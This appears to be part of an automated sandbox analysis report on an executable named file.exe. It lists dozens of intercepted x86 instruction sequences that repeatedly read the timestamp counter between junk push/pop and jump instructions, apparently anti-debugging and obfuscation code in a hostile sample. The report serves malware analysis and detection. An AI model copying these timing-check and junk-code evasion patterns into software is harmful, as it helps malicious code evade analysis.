              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6BF4B second address: A6BF75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007FBF315524C4h 0x00000013 mov eax, dword ptr [eax] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 pushad 0x00000019 popad 0x0000001a pop eax 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6C19F second address: A6C22F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FBF3154D24Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007FBF3154D248h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 adc di, F979h 0x0000002c push ebx 0x0000002d mov edx, dword ptr [ebp+122D2B8Eh] 0x00000033 pop edi 0x00000034 push 00000004h 0x00000036 call 00007FBF3154D24Fh 0x0000003b add dword ptr [ebp+122D2446h], edx 0x00000041 pop edi 0x00000042 nop 0x00000043 pushad 0x00000044 jmp 00007FBF3154D255h 0x00000049 jmp 00007FBF3154D256h 0x0000004e popad 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 push edx 0x00000053 push esi 0x00000054 pop esi 0x00000055 pop edx 0x00000056 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6C527 second address: A6C550 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FBF315524B6h 0x00000009 jmp 00007FBF315524BBh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FBF315524BFh 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6C550 second address: A6C59C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007FBF3154D248h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 0000001Ah 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 mov ch, ah 0x00000025 add dx, 02D1h 0x0000002a push 0000001Eh 0x0000002c mov edi, ebx 0x0000002e nop 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FBF3154D253h 0x00000036 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6C59C second address: A6C5A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6C852 second address: A6C856 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6C856 second address: A6C890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jns 00007FBF315524BEh 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jmp 00007FBF315524C6h 0x0000001b mov eax, dword ptr [eax] 0x0000001d push eax 0x0000001e push ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6C890 second address: A6C89F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6C89F second address: A6C8A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6C8A3 second address: A6C8AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6C8AD second address: A6C8B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6C96C second address: A6C9BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jo 00007FBF3154D250h 0x00000011 nop 0x00000012 pushad 0x00000013 add dword ptr [ebp+122D23F8h], edx 0x00000019 mov esi, edx 0x0000001b popad 0x0000001c lea eax, dword ptr [ebp+1248339Dh] 0x00000022 mov dx, F6A2h 0x00000026 mov ecx, esi 0x00000028 nop 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FBF3154D259h 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6C9BA second address: A6CA1F instructions: 0x00000000 rdtsc 0x00000002 jns 00007FBF315524CFh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d jnl 00007FBF315524B6h 0x00000013 js 00007FBF315524B6h 0x00000019 popad 0x0000001a pop ecx 0x0000001b nop 0x0000001c sbb edi, 4B123BEAh 0x00000022 lea eax, dword ptr [ebp+12483359h] 0x00000028 jnl 00007FBF315524BCh 0x0000002e and edi, 676853A5h 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007FBF315524C3h 0x0000003e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6CA1F second address: A6CA29 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FBF3154D246h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA57A9 second address: AA57AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA58E2 second address: AA591E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FBF3154D254h 0x0000000a pop eax 0x0000000b jp 00007FBF3154D26Ah 0x00000011 jp 00007FBF3154D24Eh 0x00000017 pushad 0x00000018 popad 0x00000019 jno 00007FBF3154D246h 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FBF3154D24Ch 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA5A5B second address: AA5A63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA5A63 second address: AA5A76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 jmp 00007FBF3154D24Bh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA5E85 second address: AA5E8F instructions: 0x00000000 rdtsc 0x00000002 js 00007FBF315524B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA5E8F second address: AA5ED0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FBF3154D246h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007FBF3154D258h 0x00000010 jmp 00007FBF3154D259h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAD41A second address: AAD44D instructions: 0x00000000 rdtsc 0x00000002 je 00007FBF315524B6h 0x00000008 jne 00007FBF315524B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007FBF315524C8h 0x00000015 pushad 0x00000016 jno 00007FBF315524B6h 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAC371 second address: AAC377 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AACC0A second address: AACC3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FBF315524B6h 0x0000000a jnp 00007FBF315524B6h 0x00000010 popad 0x00000011 push ebx 0x00000012 pushad 0x00000013 jng 00007FBF315524B6h 0x00000019 jnl 00007FBF315524B6h 0x0000001f jmp 00007FBF315524BAh 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b push edi 0x0000002c pop edi 0x0000002d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAD10F second address: AAD114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAFFBA second address: AB0000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF315524C7h 0x00000009 push edi 0x0000000a pop edi 0x0000000b jmp 00007FBF315524C5h 0x00000010 popad 0x00000011 push esi 0x00000012 jbe 00007FBF315524B6h 0x00000018 jmp 00007FBF315524BBh 0x0000001d pop esi 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4764 second address: AB4788 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FBF3154D250h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jmp 00007FBF3154D24Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4788 second address: AB4792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4A40 second address: AB4A46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4BBC second address: AB4BC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FBF31552502h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4D88 second address: AB4D94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4EDD second address: AB4EE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4EE5 second address: AB4EEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB501D second address: AB5023 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB52D1 second address: AB52DB instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FBF3154D246h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB55CF second address: AB55D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FBF315524B6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB55D9 second address: AB55E3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBF3154D246h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB55E3 second address: AB55E8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB5A05 second address: AB5A0B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB8085 second address: AB808B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB808B second address: AB8091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABB063 second address: ABB083 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF315524C7h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABB083 second address: ABB08E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABB08E second address: ABB094 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC0079 second address: AC00A1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b jnc 00007FBF3154D246h 0x00000011 jmp 00007FBF3154D24Bh 0x00000016 popad 0x00000017 pop esi 0x00000018 jng 00007FBF3154D268h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC00A1 second address: AC00A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABF628 second address: ABF64E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d pop eax 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pushad 0x00000012 push edx 0x00000013 pop edx 0x00000014 je 00007FBF3154D246h 0x0000001a jmp 00007FBF3154D24Bh 0x0000001f popad 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABF64E second address: ABF656 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABF656 second address: ABF65F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABF65F second address: ABF665 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABF7CC second address: ABF7D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABF91E second address: ABF928 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBF315524B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABF928 second address: ABF932 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBF3154D252h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABF932 second address: ABF95A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FBF315524B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007FBF315524CAh 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABFC21 second address: ABFC48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF3154D255h 0x00000009 jmp 00007FBF3154D24Eh 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABFC48 second address: ABFC6F instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBF315524B6h 0x00000008 jng 00007FBF315524B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FBF315524C3h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABFC6F second address: ABFC75 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC2A77 second address: AC2A98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007FBF315524CCh 0x0000000b jmp 00007FBF315524C0h 0x00000010 jbe 00007FBF315524B6h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC2C91 second address: AC2C99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC2C99 second address: AC2CA4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC8470 second address: AC8479 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC8702 second address: AC8706 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6C389 second address: A6C38D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6C38D second address: A6C3E4 instructions: 0x00000000 rdtsc 0x00000002 je 00007FBF315524B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007FBF315524B8h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 jp 00007FBF315524B6h 0x0000002c mov ebx, dword ptr [ebp+12483398h] 0x00000032 jmp 00007FBF315524BBh 0x00000037 add eax, ebx 0x00000039 adc ch, FFFFFFFCh 0x0000003c cld 0x0000003d push eax 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007FBF315524BCh 0x00000046 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6C3E4 second address: A6C3F2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBF3154D246h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6C3F2 second address: A6C3F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC8A9C second address: AC8AA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC8AA0 second address: AC8AB0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBF315524B6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC8AB0 second address: AC8AB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC8C2C second address: AC8C30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC8C30 second address: AC8C39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACFB24 second address: ACFB2A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACFB2A second address: ACFB3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007FBF3154D246h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACFB3A second address: ACFB3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD00D2 second address: AD00DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD00DB second address: AD00E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD00E1 second address: AD00E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD9743 second address: AD975F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF315524C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD9B63 second address: AD9B73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FBF3154D246h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD9B73 second address: AD9B8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b ja 00007FBF315524B6h 0x00000011 pop eax 0x00000012 push eax 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD9B8A second address: AD9B92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD9FC6 second address: AD9FCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD9FCA second address: AD9FEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3154D250h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FBF3154D24Ah 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE3B49 second address: AE3B4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE3B4F second address: AE3B54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE1E8F second address: AE1EAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF315524C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE39A1 second address: AE39A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE39A8 second address: AE39C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FBF315524B6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f push esi 0x00000010 pop esi 0x00000011 pop ebx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
